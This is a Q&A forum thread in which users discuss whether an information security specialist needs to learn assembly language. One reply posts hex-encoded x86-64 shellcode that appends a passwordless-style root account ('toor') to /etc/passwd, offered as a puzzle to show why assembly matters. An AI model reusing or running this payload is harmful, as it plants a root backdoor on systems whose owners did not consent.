F
F
Fardeen Drag2018-10-15 12:21:38
assembler
Fardeen Drag, 2018-10-15 12:21:38

Does an information security specialist need an ASSEMBLER?

Does an information security specialist need an ASSEMBLER?
At the moment I am learning C++ and studying to become a specialist in information security. And here the question arises whether I need to know ASSEMBLER?
On the Internet, everyone is divided into 2 camps: some say that it is outdated and high-level programming languages ​​have come to replace it, while others, on the contrary, argue that it is needed to "communicate" with hardware.
And yet, if it’s not difficult to answer this post, they could also write about + and - of this language (it’s painfully interesting).

Answer the question

In order to leave comments, you need to log in

10 answer(s)
J
jcmvbkbc, 2018-10-15
@jcmvbkbc

Does an information security specialist need an ASSEMBLER?
...
On the Internet, everyone is divided into 2 camps: some say that it is outdated and high-level programming languages ​​have come to replace it...

Does an information security specialist need an alphabet?
...
On the Internet, everyone is divided into 2 camps: some say that the alphabet is outdated and emojis have come to replace it...

C
CityCat4, 2018-10-15
@CityCat4

If you are going to deal with routers, access policies, networks, or let's say writing rules, manuals, instructions, analyzing logs (also necessary, albeit dreary work) or let's say NMS analytics, then most likely you don't need it.
If you are going to deal with "anti-hacking", hardware, microcontrollers, encryption viruses and other manifestations of the "wild-wild West" - you need it. It's like asking a bank vault specialist if he needs a course in safe opening techniques :D

I
Ivan Shumov, 2018-10-15
@inoise

I may not know something about Security, but when did security become associated with programming languages? Security is data encryption (at rest and in transit), these are authorization and authentication protocols, this is a response to actions in systems, this is monitoring. After all, it is a set of policies and rules for organizations. Security is different. Yes, there are things related to storing access to systems, but this is a very small slice and does not depend much on the programming language.

K
Karpion, 2018-10-15
@Karpion

It is not necessary to know assembler, but it is necessary to have an idea about it. If only because without this it is impossible to understand how MeltDown type vulnerabilities arise.
The required level of knowledge of assembler - depends on the specialization within the profession "IB".
Most likely, you will not need to program in assembler. However, information security specialists rarely program themselves - they dig into other people's programs more.

D
dmfun, 2018-10-15
@dmfun

ASM is good for everyone in terms of outlook. His knowledge is not a panacea and does not necessarily make a good specialist.
But there will be an understanding of many things. At least you need to learn binary operations and logic. Specialists who do not know how AND and XOR work and shifts are missing out on a lot. Programming is probably not necessary. Familiarize yourself with the base to get an idea. I think there is still a lot to learn in information security without going deep into ASM.

S
Sergey Gornostaev, 2018-10-15
@sergey-gornostaev

some say that it is outdated and high-level programming languages ​​have come to replace it

Ask them what it is and why
\x31\xdb\xf7\xe3\x50\xbb\xff\x73\x77\x64\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73
\x53\x48\x89\xe7\x87\xf2\x66\xbe\x01\x04\x04\x02\x0f\x05\x48\x97\xeb\x0e\x5e\x6a\x01\x58\x6a\x26\x5a
\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xed\xff\xff\xff\x74\x6f\x6f\x72\x3a\x73\x58\x75\x43\x4b\x69\x37\x6b
\x33\x58\x68\x2f\x73\x3a\x30\x3a\x30\x3a\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a

M
Mikhail Usotsky, 2018-10-15
@AquariusStar

Assembler is required for information security specialist. I, as a graduate of the Faculty of Information Security, can say that they also study it there (I don’t know about you, but I already had it). Why? Because the source code at a high level is not always obvious. You have to climb to the lower level to look for vulnerabilities there. There are still such solutions where it is better to work with assembler than with C ++. Yes, and in the arsenal of an information security specialist should be a rich set of tools and programming languages ​​in order to be able to protect against unauthorized access, leakage or loss of valuable information, violation of the program or device, and so on.

A
Alex, 2018-10-22
@asilonos

Yes, you need to know about it at the first stage.
1) Because if you don’t get to know him, you won’t understand that on some systems, for example, the heartbleed vulnerability is very unlikely to be feasible. (because all exploits are for x86-64 architectures, what does that mean??)
2) Linux Admins, as Admin IS, will calmly persuade you to patch the Linux kernel to protect against MeltDown, on a separate "non-shared" server. And this should not be done. ASM will give you this understanding.
At an advanced IS level, you need to know it a little so that you can distinguish its code in high-level languages, to implement all sorts of IS things. Because information security specialists are always learning, looking for something new, they write Articles. And so that you don’t accidentally write nonsense, you need to know the features of processor architectures. well, hotba one)) And ASM is the perfect way here.

A
Andrey Karpov, 2019-04-10
@karp89

100% needed

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question